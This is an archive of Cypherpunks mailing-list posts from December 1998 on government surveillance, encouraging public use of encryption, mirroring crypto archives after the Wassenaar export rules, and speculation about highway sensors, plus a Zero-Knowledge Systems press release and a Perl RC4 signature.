-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We live in a society where freedom is largely an illusion and where
Big Brother doesn't fear protest by the general population.  In most
cases, simply creating a crisis is enough for individuals to not only
give their liberties up but to actually plead for their liberties to
be taken away in the name of safety and security.  What they don't
realize is that the sheep are begging the wolves to protect them. 
It's not the militia guy next door that I'm worried about -- he pretty
much tells us what he's up to.  What I'm afraid of is the NSA reading
my email and listening to my phone calls without my knowledge.

So how do we get the masses to realize that we aren't talking about a
potential threat, but are actually already living in a Big Brother
society with very few secrets.  We can continue to bury our heads in
the illusion that we really are free, but we have to ask ourselves
whether we are more free today than we were ten years, five years or
even a year ago.  If the answer is no, then there is a serious
problem.

So excusing my rant, my point is that when the average individual
wakes up and realizes that his or her life really is an open book and
that every piece of email sent has been filtered through a computer
somewhere, that every posting to a newsgroup has been archived and
just may pop up and haunt them in the future, when they realize that
the only privacy available to them is the privacy that they claim and
defend then, and only then, will we see a change in crypto policies
around the world.  When the citizenry begins demanding accountability
by elected officials for the privacy that they've sold, for the chains
they've placed on their constituents and for the oaths they have
broken then we'll see the tide change for the better.

Until then, the rest of us will have to wage the fight to protect the
ignorant.

____________________________________________________
J. Richard Wilson       
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQA/AwUBNm7BSsDUWXiy5rQXEQJRUQCdEUMFE6kfNz2/hzJmOmiKoAyEKEYAoNtd
vAJ/Hc/RTsdDs+F7eLnroqCT
=Gxd/
-----END PGP SIGNATURE-----              



-----Original Message-----
From: Joel O'Connor [mailto:ogrenivek@yahoo.com]
Sent: Wednesday, 09 December, 1998 10:26
To: Anonymous
Cc: Cypherpunks@toad.com
Subject: Re: 


They say education is power abd naybe they were correct.  I agree with
the fact that more people need to use encryption, the problem (as you
stated) is that people do not understand how to use it, or even know
it exists.  Unfortunate for us, fortunate for big brother.  While the
only way we can counteract this debate is through empowerment, the
question remains, how do you spread the word to up to a million
people, enough to get their interest and keep it, enough to take the
time to teach them how to use the tools.  I work for an IT department
and the users I train rank from intelligent to "where the hell did you
come from?!"  Teaching people who have no want or need is the hardest
part, just ask Christians, they know what it's like.  Our greatest
problems lie within our inability to train and make use of what lies
in front of us, if people don't see the need, then why would they?
  Another point, some people feel that if they have nothing to hide,
then why use it.  An acquaitance of mine has the same stubborn
attitude, what steps do you take to thwart that?  That excuse bothers
me beyond belief, but it is a common thought that if you need to take
the steps to hide something, then it must be wrong.  God help us. . .




---Anonymous <nobody@replay.com> wrote:
>
> I think setting up mirror sites of crypto archives 
> across the world is a great idea.  However, I also 
> think we need to focus on getting more and more 
> people to use crypto.  I would guess that the vast 
> majority of computer users worldwide see no use 
> for encryption in their day-to-day lives -- and 
> even those that do don't also use it.
> 
> If everybody in the world is using encryption, it 
> is going to be extremely difficult for "democratic" 
> governments to tell them they can't use it any more.
> 
> Unfortunately, it's easy for governments to blame 
> crypto for terrorism and a host of other crimes, 
> simply because the average citizen doesn't understand 
> the concept of an "electronic envelope".
>         
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 9 Dec 1998 21:25:45 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812082032.OAA13166@einstein.ssz.com>
Message-ID: <366E7428.D8A8BDB5@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> 
> I suspect that with their reversal concerning anonymous numbered accounts
> and other similar changes in their laws and their enforcement that none of
> the fully developed countries in N. America, W. Europe, Pacific Rim would
> be good candidates for this sort of shenanigan without some legal backing
> from the get go. That leaves S. America, Africa, E. Europe, Middle East,
> India, and China. Not a lot of hope there. If it's not political issues,
> it's no economies, no modern infrastructure, religious, etc.

I don't see why you have to pose such severe selection criteria.
As long as a number of countries don't yet have export regulations,
one can have a number of archive sites in each one of these
countries, in so far as the financial problem is solved. We aren't
choosing a single central archive that should be up for eternity.
If the 'economies', 'infrastructure' 'religon' and what not of the 
countries do not (yet) affect crypto laws, why care about them? If 
at a later point of time some of these countries do have crypto laws, 
well, simply close down the archive there and let the sites in the 
remaining countries take over the downloading demands of the
closed down sites. Isn't that simple?

Much more important is to discuss how to solve the finacial problem
of setting up such archives, to have people maintaining them,
the technical problem of storage and the general policy of storage,
I believe.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 9 Dec 1998 21:47:07 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812091300.OAA10024@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I think setting up mirror sites of crypto archives 
across the world is a great idea.  However, I also 
think we need to focus on getting more and more 
people to use crypto.  I would guess that the vast 
majority of computer users worldwide see no use 
for encryption in their day-to-day lives -- and 
even those that do don't also use it.

If everybody in the world is using encryption, it 
is going to be extremely difficult for "democratic" 
governments to tell them they can't use it any more.

Unfortunately, it's easy for governments to blame 
crypto for terrorism and a host of other crimes, 
simply because the average citizen doesn't understand 
the concept of an "electronic envelope".
        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HaB <hab@gamegirlz.com>
Date: Thu, 10 Dec 1998 04:09:05 +0800
To: Cypherpunks@toad.com
Subject: Re:
In-Reply-To: <19981209152621.2358.rocketmail@send1e.yahoomail.com>
Message-ID: <366EC935.967DCF6D@gamegirlz.com>
MIME-Version: 1.0
Content-Type: text/plain





Joel O'Connor wrote:

> They say education is power abd naybe they were correct.  I agree with
> the fact that more people need to use encryption, the problem (as you
> stated) is that people do not understand how to use it, or even know
> it exists.  Unfortunate for us, fortunate for big brother.  While the
> only way we can counteract this debate is through empowerment, the
> question remains, how do you spread the word to up to a million
> people, enough to get their interest and keep it, enough to take the
> time to teach them how to use the tools.  I work for an IT department
> and the users I train rank from intelligent to "where the hell did you
> come from?!"  Teaching people who have no want or need is the hardest
> part, just ask Christians, they know what it's like.  Our greatest
> problems lie within our inability to train and make use of what lies
> in front of us, if people don't see the need, then why would they?
>   Another point, some people feel that if they have nothing to hide,
> then why use it.  An acquaitance of mine has the same stubborn
> attitude, what steps do you take to thwart that?  That excuse bothers
> me beyond belief, but it is a common thought that if you need to take
> the steps to hide something, then it must be wrong.  God help us. . .
>
> ---Anonymous <nobody@replay.com> wrote:
> >
> > I think setting up mirror sites of crypto archives
> > across the world is a great idea.  However, I also
> > think we need to focus on getting more and more
> > people to use crypto.  I would guess that the vast
> > majority of computer users worldwide see no use
> > for encryption in their day-to-day lives -- and
> > even those that do don't also use it.
> >
> > If everybody in the world is using encryption, it
> > is going to be extremely difficult for "democratic"
> > governments to tell them they can't use it any more.
> >
> > Unfortunately, it's easy for governments to blame
> > crypto for terrorism and a host of other crimes,
> > simply because the average citizen doesn't understand
> > the concept of an "electronic envelope".
> >
> >
> >
>

    I think the concept presented at the end of that last paragraph is one
of the best ones I have heard.  If put to the average user on those terms,
I would think it would be relatively easy to convince them of the value of
crypto.  No non-technical type would even think of sending snail mail
without an envelope, out in the open for everyone to read.  So the concept
of an "electronic envelope" for email is a very easily grasped one.
However, I have noticed that the rules that often apply to snail mail,
including basic grammar, punctiation, capitalization, etc., often do not
apply to email for some odd reason.    I think some more of the problem
lies in the fact that the tools aren't all that user-friendly for the
non-power user.  A lot of people are intimidated by the very concept of
email itself.  I can only imagine what they must think when someone begins
to go on and on about public keys, and private key, and codes, and
encrypting, and decrypting.  People fear technology.  They are the same
people who will never enter a credit card number on a secure web site, yet
have no qualms about telling it to someone over a public telephone, or cel
phone.
    That's a good place to begin, though.  "Would you send a letter to
someone without an envelope?"  "Then why not put your email in the
electronic equivalent of one?"


balance.

-HaB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Dec 1998 07:13:04 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: No Subject ( camera nonsense )
In-Reply-To: <Pine.BSF.3.96.981209194307.12228A-100000@pakastelohi.cypherpunks.to>
Message-ID: <366EF650.B19@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green wrote:
> 
> Traffic analysis is performed using wire loops in the the road. The
> sensors mountend on overpasses near truck scales fulfill a different (so
> far unknown) purpose.
> 
> --Lucky
>
The wire loops I know about use 60Hz AC and measure inductance. I 
believe that this would make them unsuitable as speed measurement
devices since measurement would extend over a number of cycles. They
might work if they were widely separated but you would have to be sure
there was only one vehicle generating the peaks.

I'd stick with the speed detector radar for now to explain the overhead
doo-dads.

m




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 10 Dec 1998 08:11:24 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: No Subject ( camera nonsense )
In-Reply-To: <366EF650.B19@lsil.com>
Message-ID: <v04103702b294b8aba93b@[130.248.15.54]>
MIME-Version: 1.0
Content-Type: text/plain



> The wire loops (in sets of two a few meters apart) are in every stretch of
> freeway in California. They report the numbers and speed of all
> vehicles. Have so for decades. This allows the Caltrans operation centers
> to instantly identify backups due to accidents, etc. Once in a while, the
> evening news do a story on these operation centers.
> 
> So we still don't know what the grey sensors do. Note that these sensors
> are typically mounted only above the two right lanes.

Check out <http://traffic.maxwell.com> for real-time results
of these sensors. You used to be able to get results for individual
sensors, but they made the site "easier to use". 
-- Marshall

Marshall Clow     Adobe Systems   <mailto:mclow@mailhost2.csusm.edu>

Freedom isn't being able to do what you like, it's allowing someone else
to do or say something you hate and supporting their right to do so.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Wed, 9 Dec 1998 14:55:34 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <4076a3c1cdc34d979bbb394d471b915e@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" wrote:
> 
> ------- Forwarded Message
> 
> Date:         Thu, 3 Dec 1998 09:18:29 -0500
> From: Dan S <dan@SOUTHEAST.NET>
> Subject:      [CTRL] Smart spy cameras on the way
> To: CTRL@LISTSERV.AOL.COM
> 
>  -Caveat Lector-
> 
> >From :
> http://www.telegraph.co.uk:80/et?ac=001036222020742&rtmo=VqqqD8sK&atmo=kkkkkkku&P4_FOLLOW_ON=/98/12/3/ecnspy03.html&pg=/et/98/12/3/ecnspy03.html
> - -
> Smart spy cameras on the way
> 
> ...
> "The quality is, it seems, in direct proportion to the amount of effort
> that users are prepared to invest in such systems. Since its
> introduction more than 20 years ago, the need for such technology has
> increased, and intelligent sensory information processing and
> information fusing is going to play a very key part in crime management.
> The next step is to add other sensory devises such as microphones to
> pick up the sound of breaking glass and sensors that can detect the
> smell of particular substances and trigger an appropriate  response."
> 
... [much deleted]


I think we read a message not so long ago from a 'punk who
spotted the prototype of these 'bomb-sniffing cameras' along
a California highway, no?



#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 10 Dec 1998 06:06:16 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: I Got Mine
In-Reply-To: <199812082325.PAA28704@smtp.well.com>
Message-ID: <199812092108.NAA22653@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



I have been told in email that the correct URL is http://www.hotwire.com/

(not the same as the wired digital site)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 10 Dec 1998 01:40:24 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812091324.HAA18021@einstein.ssz.com>
Message-ID: <366EA96D.B6E92992@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 

> 
> > I don't see why you have to pose such severe selection criteria.
> 
> Because those are the issues that will determine success.

Let there be a large number of sites. If part of these fail, there
are others that are successful. (Compare evolution.)


> > If the 'economies', 'infrastructure' 'religon' and what not of the
> > countries do not (yet) affect crypto laws, why care about them? If
> 
> They effect crypto by defintion.

How, for example, can they affects the functioning of an archive, if 
you get the right people and machine?


> 
> > at a later point of time some of these countries do have crypto laws,
> 
> If they don't have crypto laws it's likely they don't have a lot of other
> sorts of laws and the social and economic structure those laws imply. This
> makes it very difficult to operate a archive with any sort of stability or
> protection.

It is not true that there are more gangsters in the small than in 
the powerful nations. What do you mean by stability (which has plenty 
of meanings)?


> 
> > well, simply close down the archive there and let the sites in the
> 
> And what about the costs and effects incurred by that person you so glibly
> throw away?

I suppose that running an archive is a voluntary (self-sacrificing)
act of a benovolent person ready to offer his service to the public. 
If his site has to close down sometime later, he has to accept his 
bad luck. Why should you care so much minutely for him? (And you
say below that the money problem is trivial!)


> There is NO financial problem. It costs hundreds of dollars to purchase the
> hardware. The connectivity is less than $100 a month in most parts of the
> world. It simply isn't expensive or economicaly challenging.

So it rests to find people who have the time and (that small) money 
and energy to run sites and some countries that aren't going to
have strict cryto laws in the near future. THAT, however, is
difficult, I believe.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 10 Dec 1998 02:05:25 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Web Hosting Providers in Many Countries?  For crypto archives.
In-Reply-To: <3.0.5.32.19981208231218.008f15f0@idiom.com>
Message-ID: <366EAC74.1953D4EB@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:
> 

> And, of course, shipping or even selling source for 40-bit RC4
> and 512-bit RSA is pretty simple, even if you don't include the note
> "WARNING: DO NOT CHANGE THE #define KEYLENGTH TO 128 OR THE
> #define MODULUSLENGTH TO 2048 AND RECOMPILE"

Software that are parametrizable would thus all be able to escape 
the export regulations that way, I believe. But they would pose 
strict laws on the use, i.e. actual key size employed by the user,
as is the case in France, if I don't err. That will be the real 
problem, I am afraid.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Dec 1998 08:09:02 +0800
To: cryptography@c2.net
Subject: [ZKS Press Release] 50th Anniversary of the Declaration of HumanRights a Reminder th 	at Privacy must be Preserved
Message-ID: <v04020a06b294b7309928@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: Nicola Dourambeis <nicola@zks.net>
To: ZKS Press Releases <zks-press@zks.net>
Subject: [ZKS Press Release] 50th Anniversary of the Declaration of Human
Rights a Reminder th
	at Privacy must be Preserved
Date: Wed, 9 Dec 1998 18:13:51 -0500
MIME-Version: 1.0
Sender: owner-zks-press@zks.net
Precedence: normal
Reply-To: press@zks.net

========================================================
Zero-Knowledge Systems Press Release, http://www.zks.net
========================================================


50th Anniversary of the Declaration of Human Rights a Reminder that Privacy
must be Preserved.

Web site launched to allow citizens of the world to protest their loss of
privacy.

December 9, 1998 (Montreal)--On the 50th anniversary of the Universal
Declaration of Human Rights (UDHR), as well as in protest of the recent
changes to cryptography policies worldwide, Zero-Knowledge Systems is
spearheading a campaign to encourage governments to loosen newly imposed
cryptography restrictions. This campaign, seen on the web site
http://www.freecrypto.org, enables citizens of the world to express their
outrage and concern at the increasing loss of their privacy.

Article 12 of the UDHR states,

		"No one shall be subjected to arbitrary interference with
his privacy, family home, or correspondence...."

Yet, decades later, we are witnessing the unprecedented collection of
personal information and intrusions into the lives of many.  Internet users
in particular, confront multiple privacy violations while online.  Over 80%
of Internet users polled consider privacy be their primary concern.

The best defense for online privacy is to use strong cryptography, which
allows Internet users to preserve the privacy of their communications and
personal information.

On December 3, 1998, the Internet community experienced one of the strongest
setbacks to their privacy in recent years.  The 33 member countries of the
Wassenaar Arrangement agreed for the first time to impose export
restrictions on mass-market cryptography products.

Until December 3rd, the majority of the Wassenaar signatories did not impose
export controls over mass-market products that protect personal security and
privacy through cryptography.  The United States Department of Commerce
Under-Secretary has taken credit for convincing all other Wassenaar
countries to impose these added restrictions over cryptography designed for
average citizens.

Barry Steinhardt, President of the Electronic Frontier Foundation believes
"The US government has strong-armed the rest of the industrialized world
into adopting a policy that will make us less secure and more vulnerable to
electronic terrorism.  Our critical national and international
infrastructures need to be protected by strong encryption.  Weak encryption
with back doors that will be exploited not just by governments, but by
information pirates, will leave us at greater risk."

"It is not too late to reverse course," continues Steinhardt.  "Wassenaar
allows, but does not require, the other national governments to follow the
US' foolish lead."

"Cryptography is the key to preserving privacy for Internet users," explains
Austin Hill, President of Zero-Knowledge Systems.  "By limiting the
accessibility of cryptography, you are limiting people's ability to protect
themselves.  Now, more than ever, we have the ability to influence the
future of the electronic world; we must ensure that it has the same the
basic rights and protections that the UDHR promised us fifty years ago."

Hill continues, "We hope that Internet users will be proactive in protesting
this human rights infringement to their governments. The freecrypto.org web
site provides such a space, where users can learn about the issues and send
their government representatives a message expressing their dissatisfaction
with the tightening of cryptography controls."

The freecrypto.org web site provides a form that citizens can fill out and
have faxed or emailed to their respective government representatives.  It
also provides information and articles on the recently imposed cryptography
restrictions.

---------------------------------------------------------------30-----------
----------------------------------------------------

The Electronic Frontier Foundation is one of the leading civil liberties
organizations devoted to ensuring that the Internet remains the world's
first truly global vehicle for free speech, and that the privacy and
security of all on-line communication is preserved.  Founded in 1990 as a
nonprofit, public interest organization, EFF is based in San Francisco,
California and maintains an  extensive archive of information on free
speech, privacy, and encryption policy at http://www.eff.org.


Zero-Knowledge Systems Inc., http://www.zks.net, is a Canadian based
software developer dedicated to providing cryptographic solutions for the
privacy and security of Internet users.  They will be launching their first
product called Freedom(tm) in February 1999.

For more information, contact:

Nicola Dourambeis				Alex Fowler,
Marketing Associate				Director of Public Affairs
Zero-Knowledge Systems Inc.			Electronic Frontier
Foundation
Tel. (514) 286-2636 ext. 222			Tel. (415) 436-9333 ext. 103
Email. nicola@zks.net				Email. afowler@eff.org

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Wenzler <rwenzler@usachoice.com>
Date: Thu, 10 Dec 1998 08:20:21 +0800
To: HaB <hab@gamegirlz.com>
Subject: Re:
In-Reply-To: <19981209152621.2358.rocketmail@send1e.yahoomail.com>
Message-ID: <366F0A1A.654798B3@usachoice.com>
MIME-Version: 1.0
Content-Type: text/plain





HaB wrote:
<snip>
>     That's a good place to begin, though.  "Would you send a letter to
> someone without an envelope?"  "Then why not put your email in the
> electronic equivalent of one?"
> 
> balance.

Would I send a letter to someone without an envelope?
One word: postcard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@flyzone.com>
Date: Thu, 10 Dec 1998 08:14:44 +0800
To: "Ernest Hua" <cryptography@c2.net>
Subject: Re: What happened to this NY Times article on STOA andEchelon?
In-Reply-To: <006401be239b$9d75d200$4164a8c0@mve21>
Message-ID: <v03102813b294bb3a05e2@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain





The search software at the NYT leaves much to be desired. If you
enter from the front page, it assumes you only want to search
TODAY's copy of the paper. You have to re-search and click on
the whole archives. Of course, that often yields too many
articles to wade through.

For speed, here's the index of Guissani's columns. Read them
all! (But don't collect them and post them to your own website.
That's copyright violation.)

http://www.nytimes.com/library/tech/reference/indexeurobytes.html

Here's the article in question:

http://www.nytimes.com/library/cyber/euro/022498euro.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KS <ks@pobox.com>
Date: Thu, 10 Dec 1998 11:28:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: No Subject ( camera nonsense )
In-Reply-To: <366EF650.B19@lsil.com>
Message-ID: <199812100302.TAA04421@pickles.eminencesoftware.com>
MIME-Version: 1.0
Content-Type: text/plain



On the 10 Freeway about 2 miles east of Downtown Los Angeles, three are
overhead rails on both sides of the freeway with a "sensor" of some type
over EACH lane. A total of about 10 sensors. There are also cameras all
over the place. I would imagine that it is a future revenue center for the
state of California. Obfuscate your license plate to lower your road taxes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@idsi.net
Date: Thu, 10 Dec 1998 08:14:42 +0800
To: cypherpunks@toad.com
Subject: A server for a crypto CD?
Message-ID: <Pine.LNX.3.96.981209191701.2231A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain




Hello all .. 

Does anyone have a server with a CDROM drive?

I have a 500+ meg archive of crypto-related material (crypto, stego,
tempest, information theory, etc). Lots of software, applications,
and papers (100M or so). 

I'd be glad to burn out a CD, and send it to anyone who can put the
material online. It'll take time to get it ready: I need time to
strip out some stuff (non-redistributable Fortezza stuff .. its probably
a moot point, now that we have Skipjack, but why risk it for something
so dumb?). 

If you have the bandwidth, let me know.

Michael J. Graffam (mgraffam@idsi.net)
They (who) seek to establish systems of government based on the
regimentation of all human beings by a handful of individual rulers..
call this a new order. It is not new, and it is not order."
				- Franklin Delano Roosevelt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Thu, 10 Dec 1998 03:47:51 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: No Subject ( camera nonsense )
In-Reply-To: <366EB658.3E32@lsil.com>
Message-ID: <Pine.BSF.3.96.981209194307.12228A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



Traffic analysis is performed using wire loops in the the road. The
sensors mountend on overpasses near truck scales fulfill a different (so
far unknown) purpose.

--Lucky

On Wed, 9 Dec 1998, Michael Motyka wrote:

> 
> > I think we read a message not so long ago from a 'punk who
> > spotted the prototype of these 'bomb-sniffing cameras' along
> > a California highway, no?
> >
> Don't remember the date but when asked to pinpoint the thing so someone
> else could actually go take a look there was no response from the
> original poster. I wrote it off as babbling.
> 
> There is one device above the westbound section of 580 on the Livermore
> side of the Altamont pass. About the size of a small SpectraPhysics
> Laser, the surface appears solid - i.e. no visual sensor. My best guess
> - radar for either speed measurement or traffic density measurement. 
> Chemical sniffer - NOT. 
> Radiation detector - perhaps, but I doubt it.
> 
> Best bet - traffic analysis. These counties here are always fighting
> about population growth and the traffic implications. As if one stinking
> town owns the entire godamned federal interstate. Little, carpetbagging
> Napoleans everywhere you look. 
> 
> As for neural systems detecting illegal activity - yeah? what? Two
> people talking? Looking disreputable? Having their hands *appear* to
> coincide for a second? This "technology", if detected in a public place,
> should be zapped and the promoters tarred and feathered*. 
> 
> *Superglue or RTV and polyfill may legally be substituted for the
> traditional materials. 
> 
> m
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 10 Dec 1998 04:13:58 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: The politics of crypto archives
In-Reply-To: <199812091742.LAA18947@einstein.ssz.com>
Message-ID: <366EC969.DA01FF3F@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 

>  > Let there be a large number of sites. If part of these fail, there
>  > are others that are successful. (Compare evolution.)
> 
>  But two sites don't reproduce to make a 3rd site, some set of sites don't
>  deny environmental resources to others, etc. etc. Your analogy is flawed on
>  many levels.

It simply means survival of the fittest.

> 
>  If the sites go down that often what motive would somebody else have if they
>  know they'll face the same sorts of problems and won't have any additional
>  resources to help them face it?
> 
>  Why would you put up a site if you knew that the 14 others before had failed
>  and that nobody would help with your legal fees when you did go down?
> 
>  It's one thing to put your neck on the block for yourself, it's a whole
>  other issue when you start asking other people to do it for your benefit
>  (they obviously don't need an archive since they have the resources already)
>  when you make it clear that you won't reimburse or otherwise recognize their
>  efforts for YOU.

We were talking about a site that has to be closed because of (new)
crypto laws, not technically down which is seldom with modern hardware.
And also you said that money is no problem!

Why you care so much about people who voluteer to run sites? They
certainly know what kind of risks that they probably face, financial
or otherwise. Do you care your neighbour who opens up a new company
and do you feel unconditionally have to give him advices?? Are you 
the one who is cleverer than all the others?


> 
>  > > > If the 'economies', 'infrastructure' 'religon' and what not of the
>  > > > countries do not (yet) affect crypto laws, why care about them? If
>  > >
>  > > They effect crypto by defintion.
>  >
>  > How, for example, can they affects the functioning of an archive, if
>  > you get the right people and machine?
> 
>  Because those machines have to be available and paid for, their utilities need
>  to exist and need to be reliable, the police need to have some sort of legal
>  boundary to cross, and you need some recognized and guaranteed legal recourse
>  for your own self defence.
> 
>  Those are just a couple of the issues involved in running a archive site.
> 
>  Things don't exist in vacuum. You naively take WAY(!!!) too much for
>  granted.
> 
>  I'll tell you what. Just as an experiment put up a CDR node for 6 months
>  and see what it's like. Keep the box up 24 hours a day, pay the electricity,
>  phone lines, domain name, etc. We're talking less than $500 total if you
>  already own a box. Such an experiment is within the reach of just about
>  any person who has sufficient resources (even students) to surf the web.
> 
>  If you don't have the infrastructure to send the email in the clear then
>  crypto won't effect that one whit. And putting up an archive that nobody
>  can get to is not worth the effort either.

Then why did you tell me previously that the finacial problem is
nothing?? Any cite connected to the internet is certainly available
everywhere as long as the machine is up.

> 
>  > > If they don't have crypto laws it's likely they don't have a lot of other
>  > > sorts of laws and the social and economic structure those laws imply. This
>  > > makes it very difficult to operate a archive with any sort of stability or
>  > > protection.
>  >
>  > It is not true that there are more gangsters in the small than in
>  > the powerful nations. What do you mean by stability (which has plenty
>  > of meanings)?
> 
>  Well of course not, the populations aren't comparable. However, it is clear
>  that smaller 3rd world countries have much more stringent regulations or
>  because the instability causes there to be no standards to regulation and
>  lack many of the protections we in the US take for granted. It makes the
>  continued existance of the archive problematic. Putting up an archive on
>  Monday only to have it go down on Tuesday is pyrrhic at best.
> 
>  I use stability in the commen political meaning. The country has a
>  political and social system that is long-lived, has a well defined mechanism
>  for transfer of power (if they even recognize transfer of power), etc.
> 
>  If you're in a situation where some rebels or other forces start lobbing
>  mortar shells into your immediate area then crypto is the least of your
>  worries. Or as in Columbia where a group drove into town, drug people out
>  into the street and shot them in the head.
> 
>  Consider S. Korea. Even though it's a democracy it's illegal to operate a
>  firewall. The closest place S. Koreans can get in many cases to a firewall
>  and network security (for groups outside of S. Korea) is Australia. Now how
>  do you expect to seriously run a crypto site when the military and police
>  have a legal authority to come rummage in your system at will? And can put
>  you in detention if you deny them that access?
> 
>  Those sorts of places are where crypto is needed but clearly can't do the
>  job for themselves.

Remember the assumption is that a site is in a country which has
yet have no crypto laws. It then runs till that country poses
crypto laws. So you can exclude your example. If a country turns
out to be unstable than the effect is that we have one site less
from that time point. If there are plenty of sites, what problem
do you see??


> 
>  > > And what about the costs and effects incurred by that person you so glibly
>  > > throw away?
>  >
>  > I suppose that running an archive is a voluntary (self-sacrificing)
>  > act of a benovolent person ready to offer his service to the public.
>  > If his site has to close down sometime later, he has to accept his
>  > bad luck. Why should you care so much minutely for him? (And you
>  > say below that the money problem is trivial!)
> 
>  No, it isn't self-sacrifice. It's sacrifice for the users of that archive.
>  Their motives are not self-centered, they're society centered. As users of
>  those archives you OWE them.
> 
>  I would suggest strongly(!) that you spend more time studying ethics and
>  morality.

If you want to discuss ethics and morality then you should better
switch to other groups where there are more people who like to hear
you.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Thu, 10 Dec 1998 03:55:13 +0800
To: cryptography@c2.net
Subject: Re: German government press release on Wassenaar
In-Reply-To: <v04020a1bb2941c8e1795@[139.167.130.246]>
Message-ID: <m0znoui-0003bAC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Press release from the Ministry of Economy
>>
>>        Export control for encryption technology loosened
>
>War is Peace, Freedom is Slavery?

My first reaction was something along that line. However there are a
two important points to note:

1.) Officials point out that "export control" does not mean "export
restriction".  There are forms of "export control" (such as the
requirement to notify the Export Office of your exports) that do not
hinder the export of crypto software in any significant way.  So it
remains to be seen how Germany and other countries will implement
the new rules.

2.) The government has acknowledged that public domain software
remains unrestricted. This also applies to copyrighted software such
as PGP which "has been made available without restrictions upon its
further dissemination".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Thu, 10 Dec 1998 11:15:48 +0800
To: mgraffam@idsi.net
Subject: Re: A server for a crypto CD?
In-Reply-To: <Pine.LNX.3.96.981209191701.2231A-100000@albert>
Message-ID: <Pine.BSF.3.96.981209202905.6522A-100000@greeves.mfn.org>
MIME-Version: 1.0
